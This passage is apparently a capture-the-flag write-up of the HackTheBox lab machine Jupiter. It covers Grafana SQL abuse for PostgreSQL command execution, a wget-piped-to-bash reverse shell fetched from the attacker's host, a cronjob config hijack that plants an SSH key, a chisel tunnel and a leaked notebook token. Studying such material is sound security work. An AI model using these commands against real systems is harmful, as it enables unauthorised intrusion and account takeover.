In Jupiter, we ran SQL queries against a PostgreSQL database through Grafana, which let us execute commands as an initial user. We then gained SSH access as a second user through a cronjob that runs the Shadow Simulator. A third user was running Jupyter Notebook, and we gained access as that user by executing code in it. Finally, we escalated privileges by analyzing a satellite-tracking project.

| Field | Value |
| --- | --- |
| Name | Jupiter |
| OS | Linux |
| Points | 30 |
| Difficulty | Medium |
| IP | 10.10.11.216 |
| Maker | mto |
| Matrix (User Rate) | Enumeration 6.3, Real-Life 5, CVE 4.7, Custom Exploitation 5.3, CTF-Like 5 |
| Matrix (Maker Rate) | 0 in all five categories |

Recon

nmap

nmap shows two open ports: HTTP (80) and SSH (22).

|

# Nmap 7.94 scan initiated Wed Oct 11 14:44:55 2023 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.10.11.216

Nmap scan report for 10.10.11.216

Host is up (0.069s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 256 ac:5b:be:79:2d:c9:7a:00:ed:9a:e6:2b:2d:0e:9b:32 (ECDSA)

|_ 256 60:01:d7:db:92:7b:13:f0:ba:20:c6:c9:00:a7:1b:41 (ED25519)

80/tcp open http nginx 1.18.0 (Ubuntu)

|_http-title: Did not follow redirect to http://jupiter.htb/

|_http-server-header: nginx/1.18.0 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Wed Oct 11 14:45:06 2023 -- 1 IP address (1 host up) scanned in 10.52 seconds

|

Web Site

The website redirects us to the domain jupiter.htb, which we add to the /etc/hosts file.

|

π ~/htb/jupiter ❯ curl -sI 10.10.11.216

HTTP/1.1 301 Moved Permanently

Server: nginx/1.18.0 (Ubuntu)

Date: Wed, 11 Oct 2023 18:45:10 GMT

Content-Type: text/html

Content-Length: 178

Connection: keep-alive

Location: http://jupiter.htb/

π ~/htb/jupiter ❯

|
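The redirect means the name jupiter.htb has to resolve locally. Below is a minimal sketch of building the hosts line and checking whether hosts-file text already maps the name. The helper names are illustrative and not part of the original write-up, and the sketch only builds and inspects text rather than editing /etc/hosts.

```python
def hosts_line(ip: str, *names: str) -> str:
    """Build one hosts-file line, e.g. '10.10.11.216 jupiter.htb'."""
    return f"{ip} {' '.join(names)}"


def maps_name(hosts_text: str, name: str) -> bool:
    """Return True if any non-comment line of the hosts text lists `name`."""
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        # fields[0] is the address; the rest are hostnames and aliases
        if len(fields) > 1 and name in fields[1:]:
            return True
    return False


# Hypothetical starting content of a hosts file.
existing = "127.0.0.1 localhost\n"
if not maps_name(existing, "jupiter.htb"):
    existing += hosts_line("10.10.11.216", "jupiter.htb") + "\n"
print(existing, end="")
```

The same check can be repeated later for any additional virtual host names that turn up.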

The site appears to be static, since the forms on it have no working functionality.

Directory Brute Forcing

feroxbuster shows only static pages and resources.

|

π ~/htb/jupiter ❯ feroxbuster -u http://jupiter.htb/

___ ___ __ __ __ __ __ ___

|__ |__ |__) |__) | / ` / \ \_/ | | \ |__

| |___ | \ | \ | \__, \__/ / \ | |__/ |___

by Ben "epi" Risher 🤓 ver: 2.10.0

───────────────────────────┬──────────────────────

🎯 Target Url │ http://jupiter.htb/

🚀 Threads │ 50

📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

👌 Status Codes │ All Status Codes!

💥 Timeout (secs) │ 7

🦡 User-Agent │ feroxbuster/2.10.0

💉 Config File │ /etc/feroxbuster/ferox-config.toml

🔎 Extract Links │ true

🏁 HTTP methods │ [GET]

🔃 Recursion Depth │ 4

───────────────────────────┴──────────────────────

🏁 Press [ENTER] to use the Scan Management Menu™

──────────────────────────────────────────────────

403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter

404 GET 7l 12w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter

301 GET 7l 12w 178c http://jupiter.htb/css => http://jupiter.htb/css/

301 GET 7l 12w 178c http://jupiter.htb/js => http://jupiter.htb/js/

301 GET 7l 12w 178c http://jupiter.htb/img => http://jupiter.htb/img/

200 GET 6l 77w 3351c http://jupiter.htb/css/owl.carousel.min.css

200 GET 5l 37w 4168c http://jupiter.htb/img/icons/si-1.png

200 GET 6l 27w 3521c http://jupiter.htb/img/icons/si-2.png

200 GET 5l 79w 2505c http://jupiter.htb/css/slicknav.min.css

200 GET 251l 759w 11969c http://jupiter.htb/services.html

200 GET 225l 536w 10141c http://jupiter.htb/contact.html

200 GET 268l 628w 11913c http://jupiter.htb/portfolio.html

200 GET 351l 795w 6948c http://jupiter.htb/css/magnific-popup.css

200 GET 266l 701w 12613c http://jupiter.htb/about.html

200 GET 6l 26w 2932c http://jupiter.htb/img/icons/si-3.png

200 GET 399l 1181w 19680c http://jupiter.htb/index.html

200 GET 584l 1619w 20977c http://jupiter.htb/js/jquery.slicknav.js

200 GET 182l 306w 4202c http://jupiter.htb/js/main.js

200 GET 7l 35w 3598c http://jupiter.htb/img/icons/si-4.png

200 GET 4l 66w 31000c http://jupiter.htb/css/font-awesome.min.css

200 GET 79l 431w 32802c http://jupiter.htb/img/team/team-3.jpg

200 GET 63l 491w 46294c http://jupiter.htb/img/team/team-1.jpg

200 GET 1159l 2347w 25252c http://jupiter.htb/css/elegant-icons.css

200 GET 158l 582w 49359c http://jupiter.htb/img/team/team-4.jpg

200 GET 9l 394w 24103c http://jupiter.htb/js/masonry.pkgd.min.js

200 GET 2l 1283w 86927c http://jupiter.htb/js/jquery-3.3.1.min.js

200 GET 4l 212w 20216c http://jupiter.htb/js/jquery.magnific-popup.min.js

301 GET 7l 12w 178c http://jupiter.htb/img/blog => http://jupiter.htb/img/blog/

200 GET 2174l 4138w 38852c http://jupiter.htb/css/style.css

200 GET 118l 859w 75695c http://jupiter.htb/img/team/team-2.jpg

301 GET 7l 12w 178c http://jupiter.htb/fonts => http://jupiter.htb/fonts/

200 GET 86l 411w 41833c http://jupiter.htb/img/logo/logo-jupiter.png

301 GET 7l 12w 178c http://jupiter.htb/img/about => http://jupiter.htb/img/about/

200 GET 449l 2746w 227845c http://jupiter.htb/img/hero/juno.jpg

200 GET 584l 2604w 274076c http://jupiter.htb/img/team-bg.jpg

200 GET 7l 277w 44342c http://jupiter.htb/js/owl.carousel.min.js

200 GET 371l 1767w 151469c http://jupiter.htb/img/callto-bg.jpg

200 GET 6l 685w 60132c http://jupiter.htb/js/bootstrap.min.js

200 GET 18l 930w 89031c http://jupiter.htb/js/mixitup.min.js

200 GET 6l 2099w 160357c http://jupiter.htb/css/bootstrap.min.css

301 GET 7l 12w 178c http://jupiter.htb/img/icons => http://jupiter.htb/img/icons/

301 GET 7l 12w 178c http://jupiter.htb/img/work => http://jupiter.htb/img/work/

301 GET 7l 12w 178c http://jupiter.htb/img/portfolio => http://jupiter.htb/img/portfolio/

200 GET 1532l 9164w 702346c http://jupiter.htb/img/hero/jupiter-01.jpg

301 GET 7l 12w 178c http://jupiter.htb/img/logo => http://jupiter.htb/img/logo/

301 GET 7l 12w 178c http://jupiter.htb/img/team => http://jupiter.htb/img/team/

200 GET 6999l 31058w 2920253c http://jupiter.htb/img/hero/jupiter-02.png

200 GET 399l 1181w 19680c http://jupiter.htb/

301 GET 7l 12w 178c http://jupiter.htb/Source => http://jupiter.htb/Source/

301 GET 7l 12w 178c http://jupiter.htb/img/testimonial => http://jupiter.htb/img/testimonial/

301 GET 7l 12w 178c http://jupiter.htb/img/hero => http://jupiter.htb/img/hero/

|

Subdomain

After running ffuf against the machine, we found the subdomain kiosk.jupiter.htb.

|

π ~/htb/jupiter ❯ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.jupiter.htb" -u http://jupiter.htb -fs 178

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/

\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\

\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/

\ \_\ \ \_\ \ \____/ \ \_\

\/_/ \/_/ \/___/ \/_/

v2.0.0-dev

________________________________________________

:: Method : GET

:: URL : http://jupiter.htb

:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

:: Header : Host: FUZZ.jupiter.htb

:: Follow redirects : false

:: Calibration : false

:: Timeout : 10

:: Threads : 40

:: Matcher : Response status: 200,204,301,302,307,401,403,405,500

:: Filter : Response size: 178

________________________________________________

[Status: 200, Size: 34390, Words: 2150, Lines: 212, Duration: 74ms]

* FUZZ: kiosk

:: Progress: [114441/114441] :: Job [1/1] :: 636 req/sec :: Duration: [0:03:06] :: Errors: 0 ::

π ~/htb/jupiter ❯

|
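The `-fs 178` option drops every response whose body is 178 bytes, the size of the default redirect page, so only virtual hosts that answer differently remain. Below is a small sketch of that filtering step applied to results that were already collected. The tuple layout is an assumption made for illustration, and the `www` and `mail` rows are made-up examples; only the `kiosk` row comes from the output above.

```python
from typing import Iterable, List, Tuple

# (wordlist entry, HTTP status, body size in bytes)
Result = Tuple[str, int, int]


def host_header(label: str, domain: str = "jupiter.htb") -> str:
    """Value sent in the Host header for one wordlist entry."""
    return f"{label}.{domain}"


def interesting(results: Iterable[Result], filtered_size: int = 178) -> List[str]:
    """Keep virtual hosts whose response size differs from the filtered size."""
    return [host_header(label) for label, _status, size in results
            if size != filtered_size]


# The first two rows are hypothetical; the last one matches the ffuf hit.
sample = [("www", 301, 178), ("mail", 301, 178), ("kiosk", 200, 34390)]
print(interesting(sample))
```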

kiosk.jupiter.htb



On the subdomain we find information about satellites and planets.

The login option also takes us to the Grafana panel, where we can see its version: 9.5.2.

Grafana - SQL Query





On every visit to the Grafana index page, BurpSuite shows a request to the server that contains a SQL query, in this case one that returns the number of moons.

We can run our own queries to pull information about the databases. PostgreSQL is the database engine; we listed several databases and retrieved the password hash stored in pg_shadow, which we could not crack. The response is column-oriented, so the hash appears to belong to grafana_viewer rather than to postgres.

|

-- version

PostgreSQL 14.8 (Ubuntu 14.8-0ubuntu0.22.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, 64-bit

-- databases

["postgres","moon_namesdb","template1","template0"]

-- SELECT usename, passwd from pg_shadow;

"data":{"values":[["postgres","grafana_viewer"],[null,"SCRAM-SHA-256$4096:K9IJE4h9f9+tr7u7AZL76w==$qdrtC1sThWDZGwnPwNctrEbEwc8rFpLWYFVTeLOy3ss=:oD4gG69X8qrSG4bXtQ62M83OkjeFDOYrypE3tUv0JOY="]]}

|




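The request seen in BurpSuite carries the SQL text in its body, so replacing that text is enough to run other queries. Here is a rough sketch of building such a body. The field names (`queries`, `refId`, `datasource`, `rawSql`, `format`) are an assumption about the shape of the captured request, and the datasource uid is a placeholder, so both should be compared with the intercepted request before use.

```python
import json


def build_query_body(raw_sql: str, datasource_uid: str) -> str:
    """Serialize a request body carrying one raw SQL query.

    The field names are an assumption about the body shape; check them
    against the request captured in the proxy.
    """
    body = {
        "queries": [
            {
                "refId": "A",
                "datasource": {"type": "postgres", "uid": datasource_uid},
                "rawSql": raw_sql,
                "format": "table",
            }
        ]
    }
    return json.dumps(body)


# "PLACEHOLDER_UID" is hypothetical; the real value comes from the captured request.
print(build_query_body("SELECT usename, passwd FROM pg_shadow;", "PLACEHOLDER_UID"))
```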

Read Files

We were able to read files with COPY; /etc/passwd lists the users jovian and juno.





We were also able to execute commands.

|

-- Query

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'id';

SELECT * FROM cmd_exec; DROP TABLE IF EXISTS cmd_exec;

-- result

"data":{"values":[["uid=114(postgres) gid=120(postgres) groups=120(postgres),119(ssl-cert)"]]}

|
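The four statements above follow a fixed pattern: create a scratch table, fill it with the output of a program, read it back, and clean up. Below is a small sketch that renders the same sequence for an arbitrary command. The function name is illustrative, and the only processing it adds is doubling single quotes so the command fits inside a SQL string literal.

```python
def copy_program_sql(command: str, table: str = "cmd_exec") -> str:
    """Return the statement sequence that runs `command` and reads its output."""
    # Inside a standard SQL string literal a single quote is written as two.
    quoted = command.replace("'", "''")
    return "\n".join([
        f"DROP TABLE IF EXISTS {table};",
        f"CREATE TABLE {table}(cmd_output text);",
        f"COPY {table} FROM PROGRAM '{quoted}';",
        f"SELECT * FROM {table}; DROP TABLE IF EXISTS {table};",
    ])


print(copy_program_sql("id"))
```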

User - Postgres

We ran shells and modified the query so that it downloads a reverse-shell payload and pipes it to bash.

|

DROP TABLE IF EXISTS cmd_exec;

CREATE TABLE cmd_exec(cmd_output text);

COPY cmd_exec FROM PROGRAM 'wget -qO- 10.10.15.0:8000/10.10.15.0:1335 | bash ';

SELECT * FROM cmd_exec; DROP TABLE IF EXISTS cmd_exec;

|

This gave us access to the machine as postgres.

|

π ~/htb/jupiter ❯ rlwrap nc -lvp 1335

listening on [any] 1335 ...

connect to [10.10.15.0] from jupiter.htb [10.10.11.216] 49256

/bin/sh: 0: can't access tty; job control turned off

$ which python

$ which python3

/usr/bin/python3

$ python3 -c 'import pty;pty.spawn("/bin/bash");'

postgres@jupiter:/var/lib/postgresql/14/main$ whoami;id;pwd

whoami;id;pwd

postgres

uid=114(postgres) gid=120(postgres) groups=120(postgres),119(ssl-cert)

/var/lib/postgresql/14/main

postgres@jupiter:/var/lib/postgresql/14/main$

|

Shadow - Cronjob

After running pspy we found a cronjob that runs every two minutes; it runs shadow (The Shadow Simulator) on the file network-simulation.yml.

|

2023/10/11 20:25:51 CMD: UID=114 PID=15760 | postgres: 14/main: autovacuum worker postgres

2023/10/11 20:26:01 CMD: UID=0 PID=15761 | /usr/sbin/CRON -f -P

2023/10/11 20:26:01 CMD: UID=0 PID=15762 | /usr/sbin/CRON -f -P

2023/10/11 20:26:01 CMD: UID=1000 PID=15763 | /bin/bash /home/juno/shadow-simulation.sh

2023/10/11 20:26:01 CMD: UID=1000 PID=15764 | rm -rf /dev/shm/shadow.data

2023/10/11 20:26:01 CMD: UID=1000 PID=15765 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml

2023/10/11 20:26:01 CMD: UID=1000 PID=15768 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml

2023/10/11 20:26:01 CMD: UID=1000 PID=15769 | lscpu --online --parse=CPU,CORE,SOCKET,NODE

2023/10/11 20:26:01 CMD: UID=1000 PID=15774 | /usr/bin/python3 -m http.server 80

2023/10/11 20:26:01 CMD: UID=1000 PID=15775 | /usr/bin/curl -s server

2023/10/11 20:26:01 CMD: UID=1000 PID=15777 | /usr/bin/curl -s server

2023/10/11 20:26:01 CMD: UID=1000 PID=15779 | /usr/bin/curl -s server

2023/10/11 20:26:01 CMD: UID=1000 PID=15784 | cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/

2023/10/11 20:26:11 CMD: UID=114 PID=15785 | /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main -c config_file=/etc/postgresql/14/main/postgresql.conf

2023/10/11 20:26:32 CMD: UID=114 PID=15786 | postgres: 14/main: autovacuum worker

|
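Grouping the pspy events by UID makes it easier to see which commands belong to juno (UID 1000) and which belong to root or postgres. The following is a sketch under the assumption that every event line has the `date time CMD: UID=… PID=… | command` layout shown above; the helper name is illustrative.

```python
import re
from collections import defaultdict

PSPY_LINE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s*\|\s*(?P<cmd>.*)$"
)


def commands_by_uid(lines):
    """Group the command text of pspy CMD events by numeric UID."""
    grouped = defaultdict(list)
    for line in lines:
        match = PSPY_LINE.match(line.strip())
        if match:
            grouped[int(match["uid"])].append(match["cmd"])
    return dict(grouped)


# Three lines copied from the capture above.
sample = [
    "2023/10/11 20:26:01 CMD: UID=0 PID=15761 | /usr/sbin/CRON -f -P",
    "2023/10/11 20:26:01 CMD: UID=1000 PID=15763 | /bin/bash /home/juno/shadow-simulation.sh",
    "2023/10/11 20:26:01 CMD: UID=1000 PID=15765 | /home/juno/.local/bin/shadow /dev/shm/network-simulation.yml",
]
for uid, cmds in commands_by_uid(sample).items():
    print(uid, cmds)
```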

The file starts a Python HTTP server on port 80, and then three 'client' processes send requests to it with curl.

|

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: python3
      args: -m http.server 80
      start_time: 3s
      # tell shadow to expect this process to still be running at the end of the
      # simulation
      expected_final_state: running
  # three hosts with hostnames 'client1', 'client2', and 'client3' using a yaml
  # anchor to avoid duplicating the options for each host
  client1: &client_host
    network_node_id: 0
    processes:
    - path: curl
      args: -s server
      start_time: 5s
  client2: *client_host
  client3: *client_host

|

The file is readable and writable by everyone, so we can modify it.

|

postgres@jupiter:/dev/shm$ ls -lah

total 40K

drwxrwxrwt 3 root root 140 Oct 11 23:34 .

drwxr-xr-x 20 root root 4.0K Oct 11 05:39 ..

-rw-rw-rw- 1 juno juno 415 Oct 11 23:35 network-simulation.yml

-rw------- 1 postgres postgres 27K Oct 11 05:39 PostgreSQL.2592804128

drwx------ 2 postgres postgres 100 Oct 11 22:40 t

postgres@jupiter:/dev/shm$

|
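The `-rw-rw-rw-` string is what matters here: the last write bit applies to every other user, including postgres. Below is a short sketch of the same check done on a numeric mode with the standard `stat` module; the helper name is illustrative.

```python
import stat


def world_writable(mode: int) -> bool:
    """True when the 'other' write bit is set in an st_mode value."""
    return bool(mode & stat.S_IWOTH)


# A regular file with read and write for user, group, and other.
mode = stat.S_IFREG | 0o666
print(stat.filemode(mode), world_writable(mode))
```

On the machine itself, `os.stat("/dev/shm/network-simulation.yml").st_mode` would supply the mode value.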

We tried to use the simulation to create or overwrite files, in this case juno's authorized_keys. In the server section, we changed the arguments so that the HTTP server serves the /dev/shm/ directory.

|

  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80 -d /dev/shm/
      start_time: 3s

|

In the client section, curl requests the file key, which sits in /dev/shm, from the server and saves it as authorized_keys in juno's .ssh directory. This installs our public key (generated as postgres).

|

  client:
    network_node_id: 0
    quantity: 5
    processes:
    - path: /usr/bin/curl
      args: -s server/key -o /home/juno/.ssh/authorized_keys
      start_time: 5s

|

Our file ends up as follows.

|

general:
  stop_time: 120s
  model_unblocked_syscall_latency: true
network:
  graph:
    type: 1_gbit_switch
hosts:
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80 -d /dev/shm/
      start_time: 3s
  client:
    network_node_id: 0
    quantity: 5
    processes:
    - path: /usr/bin/curl
      args: -s server/key -o /home/juno/.ssh/authorized_keys
      start_time: 5s

|
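Because the file is rewritten by the cronjob after every run, it can be convenient to regenerate it from a template. This sketch renders the same configuration from three parameters. The function name is illustrative, and the indentation in the template is an assumption about how the keys nest.

```python
def shadow_config(serve_dir: str, served_name: str, dest: str, clients: int = 5) -> str:
    """Render a Shadow config whose clients save one served file to `dest`."""
    return f"""general:
  stop_time: 120s
  model_unblocked_syscall_latency: true
network:
  graph:
    type: 1_gbit_switch
hosts:
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/python3
      args: -m http.server 80 -d {serve_dir}
      start_time: 3s
  client:
    network_node_id: 0
    quantity: {clients}
    processes:
    - path: /usr/bin/curl
      args: -s server/{served_name} -o {dest}
      start_time: 5s
"""


print(shadow_config("/dev/shm/", "key", "/home/juno/.ssh/authorized_keys"))
```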

We generated a key pair with ssh-keygen and copied the public key to /dev/shm, the directory the server would serve.

|

$ ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/var/lib/postgresql/.ssh/id_rsa):

Created directory '/var/lib/postgresql/.ssh'.

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /var/lib/postgresql/.ssh/id_rsa

Your public key has been saved in /var/lib/postgresql/.ssh/id_rsa.pub

The key fingerprint is:

SHA256:ZyuvsTWOh6EDF8r4oMsUuzez8VAf1SFp27CUSLtw8MM postgres@jupiter

The key's randomart image is:

+---[RSA 3072]----+

| .....o. |

| +..*o . |

| . Eo.=. |

| + +o . |

| . o o +S o |

| = = o oo . |

| + = o ooo+ |

|+ .+= o .O.. |

|.+..+. .+oo |

+----[SHA256]-----+

$ ls -lah /var/lib/postgresql/.ssh

total 16K

drwx------ 2 postgres postgres 4.0K Oct 11 23:28 .

drwxr-xr-x 5 postgres postgres 4.0K Oct 11 23:28 ..

-rw------- 1 postgres postgres 2.6K Oct 11 23:28 id_rsa

-rw------- 1 postgres postgres 570 Oct 11 23:28 id_rsa.pub

$ cat /var/lib/postgresql/.ssh/id_rsa.pub > key

$

|
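If the served file is not a well-formed public key line, the login fails without a helpful message, so a quick sanity check before waiting for the cronjob can save a cycle. This sketch checks that the key type named at the start of the line equals the type name encoded at the start of the base64 blob. The helper name is illustrative, and the demo blob is synthetic rather than a usable key.

```python
import base64
import struct


def valid_pubkey_line(line: str) -> bool:
    """Check that an OpenSSH public key line is internally consistent.

    The decoded blob starts with a 4-byte big-endian length followed by the
    key type name, which should equal the first field of the line.
    """
    fields = line.split()
    if len(fields) < 2:
        return False
    key_type, blob_b64 = fields[0], fields[1]
    try:
        blob = base64.b64decode(blob_b64, validate=True)
    except ValueError:
        return False
    if len(blob) < 4:
        return False
    (name_len,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + name_len] == key_type.encode()


# Synthetic blob for demonstration only; it is not a usable key.
demo_blob = struct.pack(">I", 7) + b"ssh-rsa" + b"\x00" * 8
demo_line = "ssh-rsa " + base64.b64encode(demo_blob).decode() + " postgres@jupiter"
print(valid_pubkey_line(demo_line))
```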

User - Juno

After waiting for the cronjob to run, we logged in over SSH as juno and read the user.txt flag.

|

postgres@jupiter:/dev/shm$ ssh juno@localhost

Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-72-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Wed Oct 11 11:38:23 PM UTC 2023

System load: 0.0

Usage of /: 82.1% of 12.33GB

Memory usage: 22%

Swap usage: 0%

Processes: 240

Users logged in: 0

IPv4 address for eth0: 10.10.11.216

IPv6 address for eth0: dead:beef::250:56ff:feb9:2751

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.

See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Last login: Wed Jun 7 15:13:15 2023 from 10.10.14.23

juno@jupiter:~$ id

uid=1000(juno) gid=1000(juno) groups=1000(juno),1001(science)

juno@jupiter:~$ whoami;id;pwd

juno

uid=1000(juno) gid=1000(juno) groups=1000(juno),1001(science)

/home/juno

juno@jupiter:~$

juno@jupiter:~$ ls

shadow shadow-simulation.sh user.txt

juno@jupiter:~$ cat user.txt

72c93c5c9c34497e52d4131bf8a5818d

juno@jupiter:~$

|

As juno we saw that shadow-simulation.sh passes every .yml file in /dev/shm to shadow, so it was not necessary to modify the one existing file.

|

juno@jupiter:~$ cat shadow-simulation.sh

#!/bin/bash

cd /dev/shm

rm -rf /dev/shm/shadow.data

/home/juno/.local/bin/shadow /dev/shm/*.yml

cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/

juno@jupiter:~$

|
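The `*.yml` pattern in the script is expanded by the shell before shadow starts, so any file with that suffix in /dev/shm ends up on the command line. The sketch below models only that expansion with `fnmatch`. The directory listing is hypothetical (`extra.yml` stands for a file we might have added), and how shadow treats more than one path is not shown in this write-up.

```python
import fnmatch

# Hypothetical directory listing; "extra.yml" stands for a file we might add.
names = ["network-simulation.yml", "extra.yml", "key", "PostgreSQL.2592804128"]

# The shell sorts glob matches, so the sketch sorts them as well.
matches = sorted(fnmatch.filter(names, "*.yml"))
print(matches)
```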

We noticed that juno belongs to the science group, so we searched for files and directories owned by that group and found /opt/solar-flares/. The listing includes log files, .csv files, and a Jupyter notebook, flares.ipynb.

|

juno@jupiter:~$ id

uid=1000(juno) gid=1000(juno) groups=1000(juno),1001(science)

juno@jupiter:~$ find / -group science 2>/dev/null

/opt/solar-flares

/opt/solar-flares/flares.csv

/opt/solar-flares/xflares.csv

/opt/solar-flares/map.jpg

/opt/solar-flares/start.sh

/opt/solar-flares/logs

/opt/solar-flares/logs/jupyter-2023-03-10-25.log

/opt/solar-flares/logs/jupyter-2023-03-08-37.log

/opt/solar-flares/logs/jupyter-2023-03-08-38.log

/opt/solar-flares/logs/jupyter-2023-03-08-36.log

/opt/solar-flares/logs/jupyter-2023-03-09-11.log

/opt/solar-flares/logs/jupyter-2023-03-09-24.log

/opt/solar-flares/logs/jupyter-2023-03-08-14.log

/opt/solar-flares/logs/jupyter-2023-03-09-59.log

/opt/solar-flares/flares.html

/opt/solar-flares/cflares.csv

/opt/solar-flares/flares.ipynb

/opt/solar-flares/.ipynb_checkpoints

/opt/solar-flares/mflares.csv

juno@jupiter:~$

|
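The `find / -group science` search can also be expressed as a directory walk that compares each entry's group ID. This is a sketch of that idea with an illustrative function name. The demo runs against a temporary directory, because the science group only exists on the target; there, `grp.getgrnam("science").gr_gid` would provide the ID.

```python
import os
import tempfile


def paths_with_gid(root: str, gid: int):
    """Yield paths under `root` (root included) whose group ID equals `gid`."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        candidates = [dirpath] if dirpath == root else []
        candidates += [os.path.join(dirpath, name) for name in dirnames + filenames]
        for path in candidates:
            try:
                if os.lstat(path).st_gid == gid:
                    yield path
            except OSError:
                # Unreadable or vanished entries are skipped, like 2>/dev/null.
                continue


# Demo on a throwaway directory with one file in it.
with tempfile.TemporaryDirectory() as demo_root:
    demo_file = os.path.join(demo_root, "flares.csv")
    open(demo_file, "w").close()
    demo_gid = os.lstat(demo_file).st_gid
    demo_found = list(paths_with_gid(demo_root, demo_gid))
print(demo_file in demo_found)
```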

Jupyter is running with the flares notebook, and the process belongs to jovian.

|

juno@jupiter:~$ ps -ef | grep jupyter

jovian 1180 1 0 Oct11 ? 00:00:02 /usr/bin/python3 /usr/local/bin/jupyter-notebook --no-browser /opt/solar-flares/flares.ipynb

jovian 19562 1180 0 00:04 ? 00:00:00 /usr/bin/python3 -m ipykernel_launcher -f /home/jovian/.local/share/jupyter/runtime/kernel-b943ea58-0e6a-46fc-9c8c-2a795920ab25.json

juno 19747 18974 0 00:09 pts/1 00:00:00 grep --color=auto jupyter

juno@jupiter:~$

|

Port 8888, used by Jupyter, is also listening, but only on 127.0.0.1.

|

juno@jupiter:~$ netstat -ntpl

(Not all processes could be identified, non-owned process info

will not be shown, you would have to be root to see it all.)

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -

juno@jupiter:~$

|
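Services bound to 127.0.0.1 are the ones that cannot be reached from outside and need a tunnel. Here is a small sketch that pulls those listeners out of `netstat -ntpl` output. It assumes the column order shown above, and the function name is illustrative.

```python
def loopback_listeners(netstat_text: str):
    """Return (address, port) pairs for TCP listeners bound to 127.0.0.0/8."""
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # Expected columns: proto, recv-q, send-q, local, foreign, state, ...
        if len(fields) < 6 or fields[0] != "tcp" or fields[5] != "LISTEN":
            continue
        address, _, port = fields[3].rpartition(":")
        if address.startswith("127."):
            found.append((address, int(port)))
    return found


# Four lines copied from the output above.
sample = """tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8888 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
"""
print(loopback_listeners(sample))
```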

Chisel - Reverse Proxy

We ran chisel to set up a reverse SOCKS proxy.

|

# server - kali

./chisel server -p 7070 --reverse

# client - box

./chisel client 10.10.10.10:7070 R:socks

|

Jupyter Notebook

When we browse to port 8888, the site asks for a token; in this case it can be found in the most recent log in /opt/solar-flares/logs/.

|

juno@jupiter:/opt/solar-flares/logs$ cat jupyter-2023-10-11-39.log

[W 05:39:56.489 NotebookApp] Terminals not available (error was No module named 'terminado')

[I 05:39:56.496 NotebookApp] Serving notebooks from local directory: /opt/solar-flares

[I 05:39:56.496 NotebookApp] Jupyter Notebook 6.5.3 is running at:

[I 05:39:56.496 NotebookApp] http://localhost:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac

[I 05:39:56.496 NotebookApp] or http://127.0.0.1:8888/?token=0f59b92c7bc1784853411a7a97a376f58a020e220c3e01ac

[I 05:39:56.496 NotebookApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).

[W 05:39:56.500 NotebookApp] No web browser found: could not locate runnable browser.

[C 05:39:56.501 NotebookApp]

To access the notebook, open this file in a browser:
